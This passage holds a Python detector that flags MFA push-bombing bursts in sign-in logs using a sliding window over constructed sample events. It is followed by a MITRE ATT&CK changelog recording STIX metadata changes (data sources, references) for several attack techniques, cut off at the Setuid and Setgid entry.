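Added example, not ATT&CK content. The event schema is an assumption
modelled on IdP sign-in logs: one record per authentication step with the
user, a UTC timestamp, the second-factor method that was challenged
(None for a plain password step) and the outcome.
"""
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, Iterable, List, Tuple

# Constructed sample. alice receives seven push prompts in under four minutes
# and finally taps Approve; bob gets two ordinary prompts half an hour apart;
# carol is a password-spray target with no second-factor challenges at all.
SAMPLE_EVENTS = [
    {"user": "alice", "time": "2023-03-01T08:00:05Z", "method": "push", "result": "denied"},
    {"user": "alice", "time": "2023-03-01T08:00:40Z", "method": "push", "result": "timeout"},
    {"user": "alice", "time": "2023-03-01T08:01:15Z", "method": "push", "result": "denied"},
    {"user": "alice", "time": "2023-03-01T08:01:50Z", "method": "push", "result": "timeout"},
    {"user": "alice", "time": "2023-03-01T08:02:30Z", "method": "push", "result": "denied"},
    {"user": "alice", "time": "2023-03-01T08:03:10Z", "method": "push", "result": "timeout"},
    {"user": "alice", "time": "2023-03-01T08:03:55Z", "method": "push", "result": "approved"},
    {"user": "bob",   "time": "2023-03-01T09:00:00Z", "method": "push", "result": "approved"},
    {"user": "bob",   "time": "2023-03-01T09:30:00Z", "method": "sms",  "result": "approved"},
    {"user": "carol", "time": "2023-03-01T10:00:00Z", "method": None,   "result": "failed"},
    {"user": "carol", "time": "2023-03-01T10:00:01Z", "method": None,   "result": "failed"},
    {"user": "carol", "time": "2023-03-01T10:00:02Z", "method": None,   "result": "failed"},
]

Challenge = Tuple[datetime, str, str]   # (time, method, result)


def parse_time(value: str) -> datetime:
    return datetime.strptime(value, "%Y-%m-%dT%H:%M:%SZ")


def challenges_by_user(events: Iterable[dict]) -> Dict[str, List[Challenge]]:
    """Keep only second-factor challenges (push, SMS, voice), sorted per user.

    Password failures are deliberately excluded: a push bomb starts with a
    correct password, so the signal is prompt volume, not bad passwords.
    """
    per_user: Dict[str, List[Challenge]] = defaultdict(list)
    for e in events:
        if e.get("method"):
            per_user[e["user"]].append((parse_time(e["time"]), e["method"], e["result"]))
    for items in per_user.values():
        items.sort()
    return per_user


def detect_push_bombing(events: Iterable[dict], threshold: int = 5,
                        window: timedelta = timedelta(minutes=10)) -> List[dict]:
    """Flag users who receive >= threshold challenges inside any sliding window.

    Each alert reports the densest window found and whether that burst
    contains an approval, i.e. the fatigue attack probably succeeded and the
    session that followed should be revoked, not just the alert reviewed.
    """
    alerts = []
    for user, items in challenges_by_user(events).items():
        best = (0, 0, 0)          # (count, start index, end index)
        start = 0
        for end, (t, _, _) in enumerate(items):
            while t - items[start][0] > window:
                start += 1        # drop challenges that fell out of the window
            count = end - start + 1
            if count > best[0]:
                best = (count, start, end)
        count, s, e = best
        if count >= threshold:
            burst = items[s:e + 1]
            alerts.append({
                "user": user,
                "challenges": count,
                "window_start": burst[0][0].isoformat(),
                "window_end": burst[-1][0].isoformat(),
                "methods": sorted({m for _, m, _ in burst}),
                "approved_during_burst": any(r == "approved" for _, _, r in burst),
            })
    return alerts


if __name__ == "__main__":
    for alert in detect_push_bombing(SAMPLE_EVENTS):
        print(alert)
```

The threshold and window are tuning knobs: five prompts in ten minutes is far above what a legitimate user generates, but a single prompt every half hour (bob) should stay quiet, and the densest-window search keeps an attacker from evading the rule by pacing prompts just under the limit over a longer period.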

[T1046] Network Service Discovery

Current version: 3.0

Dropped Mitigations:

Details
values_changed
STIX Field | Old value | New Value
modified | 2022-04-20 16:05:30.960000+00:00 | 2023-03-30 21:01:43.682000+00:00
x_mitre_data_sources[0] | Cloud Service: Cloud Service Enumeration | Command: Command Execution
x_mitre_data_sources[2] | Command: Command Execution | Cloud Service: Cloud Service Enumeration
iterable_item_removed
STIX Field | Old value | New Value
external_references | {'source_name': 'capec', 'url': 'https://capec.mitre.org/data/definitions/300.html', 'external_id': 'CAPEC-300'} |

[T1135] Network Share Discovery

Current version: 3.1

Dropped Mitigations:

Details
dictionary_item_added
STIX Field | Old value | New Value
x_mitre_attack_spec_version |  | 3.1.0
external_references |  | Wikipedia. (2017, April 15). Shared resource. Retrieved June 30, 2017.
dictionary_item_removed
STIX Field | Old value | New Value
external_references | CAPEC-643 |
values_changed
STIX Field | Old value | New Value
modified | 2021-10-13 18:10:57.185000+00:00 | 2023-03-30 21:01:46.370000+00:00
external_references[1]['source_name'] | capec | Wikipedia Shared Resource
external_references[1]['url'] | https://capec.mitre.org/data/definitions/643.html | https://en.wikipedia.org/wiki/Shared_resource
external_references[2]['source_name'] | Wikipedia Shared Resource | TechNet Shared Folder
external_references[2]['description'] | Wikipedia. (2017, April 15). Shared resource. Retrieved June 30, 2017. | Microsoft. (n.d.). Share a Folder or Drive. Retrieved June 30, 2017.
external_references[2]['url'] | https://en.wikipedia.org/wiki/Shared_resource | https://technet.microsoft.com/library/cc770880.aspx
iterable_item_added
STIX Field | Old value | New Value
x_mitre_data_sources |  | Process: OS API Execution
iterable_item_removed
STIX Field | Old value | New Value
external_references | {'source_name': 'TechNet Shared Folder', 'description': 'Microsoft. (n.d.). Share a Folder or Drive. Retrieved June 30, 2017.', 'url': 'https://technet.microsoft.com/library/cc770880.aspx'} |
x_mitre_data_sources | Process: OS API Execution |

[T1499.001] Endpoint Denial of Service: OS Exhaustion Flood

Current version: 1.2

Dropped Mitigations:

Details
values_changed
STIX Field | Old value | New Value
modified | 2022-04-19 23:12:31.329000+00:00 | 2023-03-30 21:01:51.289000+00:00
x_mitre_data_sources[0] | Network Traffic: Network Traffic Content | Sensor Health: Host Status
x_mitre_data_sources[2] | Sensor Health: Host Status | Network Traffic: Network Traffic Content
iterable_item_removed
STIX Field | Old value | New Value
external_references | {'source_name': 'capec', 'url': 'https://capec.mitre.org/data/definitions/469.html', 'external_id': 'CAPEC-469'} |
external_references | {'source_name': 'capec', 'url': 'https://capec.mitre.org/data/definitions/482.html', 'external_id': 'CAPEC-482'} |

[T1550.002] Use Alternate Authentication Material: Pass the Hash

Current version: 1.1

Details
dictionary_item_added
STIX Field | Old value | New Value
x_mitre_attack_spec_version |  | 3.1.0
external_references |  | Warren, J. (2019, February 26). How to Detect Overpass-the-Hash Attacks. Retrieved February 4, 2021.
dictionary_item_removed
STIX Field | Old value | New Value
external_references | CAPEC-644 |
values_changed
STIX Field | Old value | New Value
modified | 2021-08-31 19:55:02.702000+00:00 | 2023-03-30 21:01:45.141000+00:00
external_references[1]['source_name'] | capec | Stealthbits Overpass-the-Hash
external_references[1]['url'] | https://capec.mitre.org/data/definitions/644.html | https://stealthbits.com/blog/how-to-detect-overpass-the-hash-attacks/
iterable_item_added
STIX Field | Old value | New Value
x_mitre_data_sources |  | User Account: User Account Authentication
iterable_item_removed
STIX Field | Old value | New Value
external_references | {'source_name': 'Stealthbits Overpass-the-Hash', 'description': 'Warren, J. (2019, February 26). How to Detect Overpass-the-Hash Attacks. Retrieved February 4, 2021.', 'url': 'https://stealthbits.com/blog/how-to-detect-overpass-the-hash-attacks/'} |
x_mitre_data_sources | User Account: User Account Authentication |

[T1550.003] Use Alternate Authentication Material: Pass the Ticket

Current version: 1.1

Details
dictionary_item_added
STIX Field | Old value | New value
x_mitre_attack_spec_version | (none) | 3.1.0
external_references | (none) | Metcalf, S. (2014, November 22). Mimikatz and Active Directory Kerberos Attacks. Retrieved June 2, 2016.
dictionary_item_removed
STIX Field | Old value | New value
external_references | CAPEC-645 | (none)
values_changed
STIX Field | Old value | New value
modified | 2021-08-31 19:56:31.341000+00:00 | 2023-03-30 21:01:38.108000+00:00
external_references[1]['source_name'] | capec | ADSecurity AD Kerberos Attacks
external_references[1]['url'] | https://capec.mitre.org/data/definitions/645.html | https://adsecurity.org/?p=556
external_references[2]['source_name'] | ADSecurity AD Kerberos Attacks | GentilKiwi Pass the Ticket
external_references[2]['description'] | Metcalf, S. (2014, November 22). Mimikatz and Active Directory Kerberos Attacks. Retrieved June 2, 2016. | Deply, B. (2014, January 13). Pass the ticket. Retrieved June 2, 2016.
external_references[2]['url'] | https://adsecurity.org/?p=556 | http://blog.gentilkiwi.com/securite/mimikatz/pass-the-ticket-kerberos
external_references[3]['source_name'] | GentilKiwi Pass the Ticket | Campbell 2014
external_references[3]['description'] | Deply, B. (2014, January 13). Pass the ticket. Retrieved June 2, 2016. | Campbell, C. (2014). The Secret Life of Krbtgt. Retrieved December 4, 2014.
external_references[3]['url'] | http://blog.gentilkiwi.com/securite/mimikatz/pass-the-ticket-kerberos | http://defcon.org/images/defcon-22/dc-22-presentations/Campbell/DEFCON-22-Christopher-Campbell-The-Secret-Life-of-Krbtgt.pdf
external_references[4]['source_name'] | Campbell 2014 | Stealthbits Overpass-the-Hash
external_references[4]['description'] | Campbell, C. (2014). The Secret Life of Krbtgt. Retrieved December 4, 2014. | Warren, J. (2019, February 26). How to Detect Overpass-the-Hash Attacks. Retrieved February 4, 2021.
external_references[4]['url'] | http://defcon.org/images/defcon-22/dc-22-presentations/Campbell/DEFCON-22-Christopher-Campbell-The-Secret-Life-of-Krbtgt.pdf | https://stealthbits.com/blog/how-to-detect-overpass-the-hash-attacks/
external_references[5]['source_name'] | Stealthbits Overpass-the-Hash | CERT-EU Golden Ticket Protection
external_references[5]['description'] | Warren, J. (2019, February 26). How to Detect Overpass-the-Hash Attacks. Retrieved February 4, 2021. | Abolins, D., Boldea, C., Socha, K., Soria-Machado, M. (2016, April 26). Kerberos Golden Ticket Protection. Retrieved July 13, 2017.
external_references[5]['url'] | https://stealthbits.com/blog/how-to-detect-overpass-the-hash-attacks/ | https://cert.europa.eu/static/WhitePapers/UPDATED%20-%20CERT-EU_Security_Whitepaper_2014-007_Kerberos_Golden_Ticket_Protection_v1_4.pdf
iterable_item_added
STIX Field | Old value | New value
x_mitre_data_sources | (none) | Logon Session: Logon Session Creation
iterable_item_removed
STIX Field | Old value | New value
external_references | {'source_name': 'CERT-EU Golden Ticket Protection', 'description': 'Abolins, D., Boldea, C., Socha, K., Soria-Machado, M. (2016, April 26). Kerberos Golden Ticket Protection. Retrieved July 13, 2017.', 'url': 'https://cert.europa.eu/static/WhitePapers/UPDATED%20-%20CERT-EU_Security_Whitepaper_2014-007_Kerberos_Golden_Ticket_Protection_v1_4.pdf'} | (none)
x_mitre_data_sources | Logon Session: Logon Session Creation | (none)

[T1110.002] Brute Force: Password Cracking

Current version: 1.2

Details
values_changed
STIX Field | Old value | New value
modified | 2022-04-19 21:33:46.023000+00:00 | 2023-03-30 21:01:48.643000+00:00
iterable_item_removed
STIX Field | Old value | New value
external_references | {'source_name': 'capec', 'url': 'https://capec.mitre.org/data/definitions/55.html', 'external_id': 'CAPEC-55'} | (none)

[T1574.007] Hijack Execution Flow: Path Interception by PATH Environment Variable

Current version: 1.0

Details
values_changed
STIX Field | Old value | New value
modified | 2022-05-05 04:08:56.402000+00:00 | 2023-03-30 21:01:39.426000+00:00
x_mitre_data_sources[0] | File: File Creation | Windows Registry: Windows Registry Key Modification
x_mitre_data_sources[2] | Windows Registry: Windows Registry Key Modification | File: File Creation
iterable_item_removed
STIX Field | Old value | New value
external_references | {'source_name': 'capec', 'url': 'https://capec.mitre.org/data/definitions/13.html', 'external_id': 'CAPEC-13'} | (none)
external_references | {'source_name': 'capec', 'url': 'https://capec.mitre.org/data/definitions/38.html', 'external_id': 'CAPEC-38'} | (none)

[T1574.008] Hijack Execution Flow: Path Interception by Search Order Hijacking

Current version: 1.0

Details
dictionary_item_added
STIX Field | Old value | New value
x_mitre_attack_spec_version | (none) | 3.1.0
external_references | (none) | Microsoft. (n.d.). CreateProcess function. Retrieved December 5, 2014.
dictionary_item_removed
STIX Field | Old value | New value
external_references | CAPEC-159 | (none)
values_changed
STIX Field | Old value | New value
modified | 2020-09-17 19:03:35.217000+00:00 | 2023-03-30 21:01:44.781000+00:00
external_references[1]['source_name'] | capec | Microsoft CreateProcess
external_references[1]['url'] | https://capec.mitre.org/data/definitions/159.html | http://msdn.microsoft.com/en-us/library/ms682425
external_references[2]['source_name'] | Microsoft CreateProcess | Windows NT Command Shell
external_references[2]['description'] | Microsoft. (n.d.). CreateProcess function. Retrieved December 5, 2014. | Tim Hill. (2014, February 2). The Windows NT Command Shell. Retrieved December 5, 2014.
external_references[2]['url'] | http://msdn.microsoft.com/en-us/library/ms682425 | https://docs.microsoft.com/en-us/previous-versions//cc723564(v=technet.10)?redirectedfrom=MSDN#XSLTsection127121120120
external_references[3]['source_name'] | Windows NT Command Shell | Microsoft WinExec
external_references[3]['description'] | Tim Hill. (2014, February 2). The Windows NT Command Shell. Retrieved December 5, 2014. | Microsoft. (n.d.). WinExec function. Retrieved December 5, 2014.
external_references[3]['url'] | https://docs.microsoft.com/en-us/previous-versions//cc723564(v=technet.10)?redirectedfrom=MSDN#XSLTsection127121120120 | http://msdn.microsoft.com/en-us/library/ms687393
external_references[4]['source_name'] | Microsoft WinExec | Microsoft Environment Property
external_references[4]['description'] | Microsoft. (n.d.). WinExec function. Retrieved December 5, 2014. | Microsoft. (2011, October 24). Environment Property. Retrieved July 27, 2016.
external_references[4]['url'] | http://msdn.microsoft.com/en-us/library/ms687393 | https://docs.microsoft.com/en-us/previous-versions//fd7hxfdd(v=vs.85)?redirectedfrom=MSDN
iterable_item_removed
STIX Field | Old value | New value
external_references | {'source_name': 'Microsoft Environment Property', 'description': 'Microsoft. (2011, October 24). Environment Property. Retrieved July 27, 2016.', 'url': 'https://docs.microsoft.com/en-us/previous-versions//fd7hxfdd(v=vs.85)?redirectedfrom=MSDN'} | (none)

[T1574.009] Hijack Execution Flow: Path Interception by Unquoted Path

Current version: 1.1

Details
values_changed
STIX Field | Old value | New value
modified | 2022-10-18 20:51:38.118000+00:00 | 2023-03-30 21:01:35.788000+00:00
x_mitre_data_sources[0] | File: File Creation | Process: Process Creation
x_mitre_data_sources[2] | Process: Process Creation | File: File Creation
iterable_item_removed
STIX Field | Old value | New value
external_references | {'source_name': 'capec', 'url': 'https://capec.mitre.org/data/definitions/38.html', 'external_id': 'CAPEC-38'} | (none)

[T1120] Peripheral Device Discovery

Current version: 1.3

Dropped Mitigations:

Details
dictionary_item_added
STIX Field | Old value | New value
x_mitre_attack_spec_version | (none) | 3.1.0
external_references | (none) | Shahriar Shovon. (2018, March). List USB Devices Linux. Retrieved March 11, 2022.
dictionary_item_removed
STIX Field | Old value | New value
external_references | CAPEC-646 | (none)
values_changed
STIX Field | Old value | New value
modified | 2022-03-11 18:39:11.763000+00:00 | 2023-03-30 21:01:41.575000+00:00
external_references[1]['source_name'] | capec | Peripheral Discovery Linux
external_references[1]['url'] | https://capec.mitre.org/data/definitions/646.html | https://linuxhint.com/list-usb-devices-linux/
external_references[2]['source_name'] | Peripheral Discovery Linux | Peripheral Discovery macOS
external_references[2]['description'] | Shahriar Shovon. (2018, March). List USB Devices Linux. Retrieved March 11, 2022. | SS64. (n.d.). system_profiler. Retrieved March 11, 2022.
external_references[2]['url'] | https://linuxhint.com/list-usb-devices-linux/ | https://ss64.com/osx/system_profiler.html
x_mitre_data_sources[0] | Command: Command Execution | Process: Process Creation
x_mitre_data_sources[2] | Process: Process Creation | Command: Command Execution
iterable_item_removed
STIX Field | Old value | New value
external_references | {'source_name': 'Peripheral Discovery macOS', 'description': 'SS64. (n.d.). system_profiler. Retrieved March 11, 2022.', 'url': 'https://ss64.com/osx/system_profiler.html'} | (none)

[T1055] Process Injection

Current version: 1.3

Details
values_changed
STIX Field | Old value | New value
modified | 2022-10-18 20:58:50.105000+00:00 | 2023-03-30 21:01:45.488000+00:00
x_mitre_data_sources[0] | Process: Process Modification | Module: Module Load
x_mitre_data_sources[6] | Module: Module Load | File: File Modification
iterable_item_added
STIX Field | Old value | New value
x_mitre_data_sources | (none) | Process: Process Modification
iterable_item_removed
STIX Field | Old value | New value
external_references | {'source_name': 'capec', 'url': 'https://capec.mitre.org/data/definitions/640.html', 'external_id': 'CAPEC-640'} | (none)
x_mitre_data_sources | File: File Modification | (none)

[T1498.002] Network Denial of Service: Reflection Amplification

Current version: 1.3

Details
dictionary_item_added
STIX Field | Old value | New value
x_mitre_attack_spec_version | (none) | 3.1.0
external_references | (none) | Marek Majkowsk, Cloudflare. (2017, May 24). Reflections on reflection (attacks). Retrieved April 23, 2019.
dictionary_item_removed
STIX Field | Old value | New value
external_references | CAPEC-490 | (none)
values_changed
STIX Field | Old value | New value
modified | 2022-03-25 20:05:38.883000+00:00 | 2023-03-30 21:01:41.052000+00:00
external_references[1]['source_name'] | capec | Cloudflare ReflectionDoS May 2017
external_references[1]['url'] | https://capec.mitre.org/data/definitions/490.html | https://blog.cloudflare.com/reflections-on-reflections/
external_references[2]['source_name'] | Cloudflare ReflectionDoS May 2017 | Cloudflare DNSamplficationDoS
external_references[2]['description'] | Marek Majkowsk, Cloudflare. (2017, May 24). Reflections on reflection (attacks). Retrieved April 23, 2019. | Cloudflare. (n.d.). What is a DNS amplification attack?. Retrieved April 23, 2019.
external_references[2]['url'] | https://blog.cloudflare.com/reflections-on-reflections/ | https://www.cloudflare.com/learning/ddos/dns-amplification-ddos-attack/
external_references[3]['source_name'] | Cloudflare DNSamplficationDoS | Cloudflare NTPamplifciationDoS
external_references[3]['description'] | Cloudflare. (n.d.). What is a DNS amplification attack?. Retrieved April 23, 2019. | Cloudflare. (n.d.). What is a NTP amplificaiton attack?. Retrieved April 23, 2019.
external_references[3]['url'] | https://www.cloudflare.com/learning/ddos/dns-amplification-ddos-attack/ | https://www.cloudflare.com/learning/ddos/ntp-amplification-ddos-attack/
external_references[4]['source_name'] | Cloudflare NTPamplifciationDoS | Arbor AnnualDoSreport Jan 2018
external_references[4]['description'] | Cloudflare. (n.d.). What is a NTP amplificaiton attack?. Retrieved April 23, 2019. | Philippe Alcoy, Steinthor Bjarnason, Paul Bowen, C.F. Chui, Kirill Kasavchnko, and Gary Sockrider of Netscout Arbor. (2018, January). Insight into the Global Threat Landscape - Netscout Arbor's 13th Annual Worldwide Infrastructure Security Report. Retrieved April 22, 2019.
external_references[4]['url'] | https://www.cloudflare.com/learning/ddos/ntp-amplification-ddos-attack/ | https://pages.arbornetworks.com/rs/082-KNA-087/images/13th_Worldwide_Infrastructure_Security_Report.pdf
external_references[5]['source_name'] | Arbor AnnualDoSreport Jan 2018 | Cloudflare Memcrashed Feb 2018
external_references[5]['description'] | Philippe Alcoy, Steinthor Bjarnason, Paul Bowen, C.F. Chui, Kirill Kasavchnko, and Gary Sockrider of Netscout Arbor. (2018, January). Insight into the Global Threat Landscape - Netscout Arbor's 13th Annual Worldwide Infrastructure Security Report. Retrieved April 22, 2019. | Marek Majkowski of Cloudflare. (2018, February 27). Memcrashed - Major amplification attacks from UDP port 11211. Retrieved April 18, 2019.
external_references[5]['url'] | https://pages.arbornetworks.com/rs/082-KNA-087/images/13th_Worldwide_Infrastructure_Security_Report.pdf | https://blog.cloudflare.com/memcrashed-major-amplification-attacks-from-port-11211/
external_references[6]['source_name'] | Cloudflare Memcrashed Feb 2018 | Cisco DoSdetectNetflow
external_references[6]['description'] | Marek Majkowski of Cloudflare. (2018, February 27). Memcrashed - Major amplification attacks from UDP port 11211. Retrieved April 18, 2019. | Cisco. (n.d.). Detecting and Analyzing Network Threats With NetFlow. Retrieved April 25, 2019.
external_references[6]['url'] | https://blog.cloudflare.com/memcrashed-major-amplification-attacks-from-port-11211/ | https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf
iterable_item_removed
STIX Field | Old value | New value
external_references | {'source_name': 'Cisco DoSdetectNetflow', 'description': 'Cisco. (n.d.). Detecting and Analyzing Network Threats With NetFlow. Retrieved April 25, 2019.', 'url': 'https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf'} | (none)

[T1547.001] Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder

Current version: 1.2

Details
values_changed
STIX Field | Old value | New value
modified | 2022-06-16 13:06:00.638000+00:00 | 2023-03-30 21:01:52.183000+00:00
x_mitre_data_sources[2] | Command: Command Execution | Windows Registry: Windows Registry Key Creation
iterable_item_added
STIX Field | Old value | New value
x_mitre_data_sources | (none) | Command: Command Execution
iterable_item_removed
STIX Field | Old value | New value
external_references | {'source_name': 'capec', 'url': 'https://capec.mitre.org/data/definitions/270.html', 'external_id': 'CAPEC-270'} | (none)
x_mitre_data_sources | Windows Registry: Windows Registry Key Creation | (none)

[T1021.001] Remote Services: Remote Desktop Protocol

Current version: 1.1

Details
dictionary_item_added
STIX Field | Old value | New value
x_mitre_attack_spec_version | (none) | 3.1.0
external_references | (none) | Microsoft. (n.d.). Remote Desktop Services. Retrieved June 1, 2016.
dictionary_item_removed
STIX Field | Old value | New value
external_references | CAPEC-555 | (none)
values_changed
STIX Field | Old value | New value
modified | 2022-03-28 16:07:44.605000+00:00 | 2023-03-30 21:01:41.927000+00:00
external_references[1]['source_name'] | capec | TechNet Remote Desktop Services
external_references[1]['url'] | https://capec.mitre.org/data/definitions/555.html | https://technet.microsoft.com/en-us/windowsserver/ee236407.aspx
external_references[2]['source_name'] | TechNet Remote Desktop Services | Alperovitch Malware
external_references[2]['description'] | Microsoft. (n.d.). Remote Desktop Services. Retrieved June 1, 2016. | Alperovitch, D. (2014, October 31). Malware-Free Intrusions. Retrieved November 4, 2014.
external_references[2]['url'] | https://technet.microsoft.com/en-us/windowsserver/ee236407.aspx | http://blog.crowdstrike.com/adversary-tricks-crowdstrike-treats/
x_mitre_data_sources[0] | Network Traffic: Network Connection Creation | Logon Session: Logon Session Creation
x_mitre_data_sources[1] | Logon Session: Logon Session Creation | Network Traffic: Network Traffic Flow
x_mitre_data_sources[2] | Process: Process Creation | Network Traffic: Network Connection Creation
x_mitre_data_sources[3] | Network Traffic: Network Traffic Flow | Process: Process Creation
iterable_item_removed
STIX Field | Old value | New value
external_references | {'source_name': 'Alperovitch Malware', 'description': 'Alperovitch, D. (2014, October 31). Malware-Free Intrusions. Retrieved November 4, 2014.', 'url': 'http://blog.crowdstrike.com/adversary-tricks-crowdstrike-treats/'} | (none)

[T1018] Remote System Discovery

Current version: 3.4

Dropped Mitigations:

Details
values_changed
STIX Field | Old value | New value
modified | 2022-09-06 22:04:59.486000+00:00 | 2023-03-30 21:01:50.033000+00:00
x_mitre_data_sources[0] | Command: Command Execution | Process: Process Creation
x_mitre_data_sources[2] | Process: Process Creation | Command: Command Execution
iterable_item_removed
STIX Field | Old value | New value
external_references | {'source_name': 'capec', 'url': 'https://capec.mitre.org/data/definitions/292.html', 'external_id': 'CAPEC-292'} | (none)

[T1014] Rootkit

Current version: 1.1

Dropped Mitigations:

Details
values_changed
STIX Field | Old value | New value
modified | 2022-05-05 05:09:39.723000+00:00 | 2023-03-30 21:01:50.568000+00:00
x_mitre_data_sources[0] | Drive: Drive Modification | File: File Modification
x_mitre_data_sources[2] | File: File Modification | Drive: Drive Modification
iterable_item_removed
STIX Field | Old value | New value
external_references | {'source_name': 'capec', 'url': 'https://capec.mitre.org/data/definitions/552.html', 'external_id': 'CAPEC-552'} | (none)

[T1608.006] Stage Capabilities: SEO Poisoning

Current version: 1.0

Details
values_changed
STIX Field | Old value | New value
modified | 2022-10-27 14:16:24.490000+00:00 | 2023-03-13 20:35:52.302000+00:00
x_mitre_attack_spec_version | 3.0.0 | 3.1.0
iterable_item_added
STIX Field | Old value | New value
x_mitre_contributors | (none) | Hiroki Nagahama, NEC Corporation
x_mitre_contributors | (none) | Manikantan Srinivasan, NEC Corporation India
x_mitre_contributors | (none) | Pooja Natarajan, NEC Corporation India

[T1021.004] Remote Services: SSH

Current version: 1.1

Details
dictionary_item_added
STIX Field | Old value | New value
x_mitre_attack_spec_version | (none) | 3.1.0
external_references | (none) | Sarah Edwards. (2020, April 30). Analysis of Apple Unified Logs: Quarantine Edition [Entry 6] – Working From Home? Remote Logins. Retrieved August 19, 2021.
dictionary_item_removed
STIX Field | Old value | New value
external_references | CAPEC-555 | (none)
values_changed
STIX Field | Old value | New value
modified | 2021-10-15 14:15:06.853000+00:00 | 2023-03-30 21:01:49.323000+00:00
external_references[1]['source_name'] | capec | Apple Unified Log Analysis Remote Login and Screen Sharing
external_references[1]['url'] | https://capec.mitre.org/data/definitions/555.html | https://sarah-edwards-xzkc.squarespace.com/blog/2020/4/30/analysis-of-apple-unified-logs-quarantine-edition-entry-6-working-from-home-remote-logins
x_mitre_data_sources[1] | Logon Session: Logon Session Creation | Process: Process Creation
x_mitre_data_sources[2] | Process: Process Creation | Logon Session: Logon Session Creation
iterable_item_removed
STIX Field | Old value | New value
external_references | {'source_name': 'Apple Unified Log Analysis Remote Login and Screen Sharing', 'description': 'Sarah Edwards. (2020, April 30). Analysis of Apple Unified Logs: Quarantine Edition [Entry 6] – Working From Home? Remote Logins. Retrieved August 19, 2021.', 'url': 'https://sarah-edwards-xzkc.squarespace.com/blog/2020/4/30/analysis-of-apple-unified-logs-quarantine-edition-entry-6-working-from-home-remote-logins'} | (none)

[T1053] Scheduled Task/Job

Current version: 2.2

Dropped Mitigations:

Details
values_changed
STIX Field | Old value | New value
modified | 2022-04-14 20:59:52.686000+00:00 | 2023-03-30 21:01:52.697000+00:00
x_mitre_data_sources[0] | Scheduled Job: Scheduled Job Creation | Process: Process Creation
x_mitre_data_sources[1] | Container: Container Creation | Scheduled Job: Scheduled Job Creation
x_mitre_data_sources[2] | Process: Process Creation | Command: Command Execution
x_mitre_data_sources[5] | Command: Command Execution | Container: Container Creation
iterable_item_removed
STIX Field | Old value | New value
external_references | {'source_name': 'capec', 'url': 'https://capec.mitre.org/data/definitions/557.html', 'external_id': 'CAPEC-557'} | (none)

[T1113] Screen Capture

Current version: 1.1

Dropped Mitigations:

Details
dictionary_item_added
STIX Field | Old value | New value
x_mitre_attack_spec_version | (none) | 3.1.0
external_references | (none) | Microsoft. (n.d.). Graphics.CopyFromScreen Method. Retrieved March 24, 2020.
dictionary_item_removed
STIX Field | Old value | New value
external_references | CAPEC-648 | (none)
values_changed
STIX Field | Old value | New value
modified | 2020-03-24 19:56:37.627000+00:00 | 2023-03-30 21:01:39.967000+00:00
external_references[1]['source_name'] | capec | CopyFromScreen .NET
external_references[1]['url'] | https://capec.mitre.org/data/definitions/648.html | https://docs.microsoft.com/en-us/dotnet/api/system.drawing.graphics.copyfromscreen?view=netframework-4.8
external_references[2]['source_name'] | CopyFromScreen .NET | Antiquated Mac Malware
external_references[2]['description'] | Microsoft. (n.d.). Graphics.CopyFromScreen Method. Retrieved March 24, 2020. | Thomas Reed. (2017, January 18). New Mac backdoor using antiquated code. Retrieved July 5, 2017.
external_references[2]['url'] | https://docs.microsoft.com/en-us/dotnet/api/system.drawing.graphics.copyfromscreen?view=netframework-4.8 | https://blog.malwarebytes.com/threat-analysis/2017/01/new-mac-backdoor-using-antiquated-code/
iterable_item_removed
STIX Field | Old value | New value
external_references | {'source_name': 'Antiquated Mac Malware', 'description': 'Thomas Reed. (2017, January 18). New Mac backdoor using antiquated code. Retrieved July 5, 2017.', 'url': 'https://blog.malwarebytes.com/threat-analysis/2017/01/new-mac-backdoor-using-antiquated-code/'} | (none)

[T1499.002] Endpoint Denial of Service: Service Exhaustion Flood

Current version: 1.3

Dropped Mitigations:

Details
values_changed
STIX Field | Old value | New value
modified | 2022-04-19 23:20:50.470000+00:00 | 2023-03-30 21:01:43.164000+00:00
x_mitre_data_sources[1] | Application Log: Application Log Content | Sensor Health: Host Status
x_mitre_data_sources[3] | Sensor Health: Host Status | Application Log: Application Log Content
iterable_item_removed
STIX Field | Old value | New value
external_references | {'source_name': 'capec', 'url': 'https://capec.mitre.org/data/definitions/488.html', 'external_id': 'CAPEC-488'} | (none)
external_references | {'source_name': 'capec', 'url': 'https://capec.mitre.org/data/definitions/489.html', 'external_id': 'CAPEC-489'} | (none)
external_references | {'source_name': 'capec', 'url': 'https://capec.mitre.org/data/definitions/528.html', 'external_id': 'CAPEC-528'} | (none)

[T1574.010] Hijack Execution Flow: Services File Permissions Weakness

Current version: 1.0

Details
dictionary_item_added
STIX Field | Old value | New value
x_mitre_attack_spec_version | (none) | 3.1.0
values_changed
STIX Field | Old value | New value
modified | 2020-09-16 19:10:04.262000+00:00 | 2023-03-30 21:01:37.026000+00:00
x_mitre_data_sources[0] | Service: Service Metadata | File: File Creation
x_mitre_data_sources[2] | File: File Creation | Service: Service Metadata
iterable_item_removed
STIX Field | Old value | New value
external_references | {'source_name': 'capec', 'url': 'https://capec.mitre.org/data/definitions/17.html', 'external_id': 'CAPEC-17'} | (none)

[T1574.011] Hijack Execution Flow: Services Registry Permissions Weakness

Current version: 1.1

Details
values_changed
STIX Field | Old value | New value
modified | 2022-05-05 04:53:45.640000+00:00 | 2023-03-30 21:01:38.651000+00:00
iterable_item_added
STIX Field | Old value | New value
x_mitre_data_sources | (none) | Command: Command Execution
iterable_item_removed
STIX Field | Old value | New value
external_references | {'source_name': 'capec', 'url': 'https://capec.mitre.org/data/definitions/478.html', 'external_id': 'CAPEC-478'} | (none)
x_mitre_data_sources | Command: Command Execution | (none)

[T1548.001] Abuse Elevation Control Mechanism: Setuid and Setgid

Current version: 1.1


Old Description

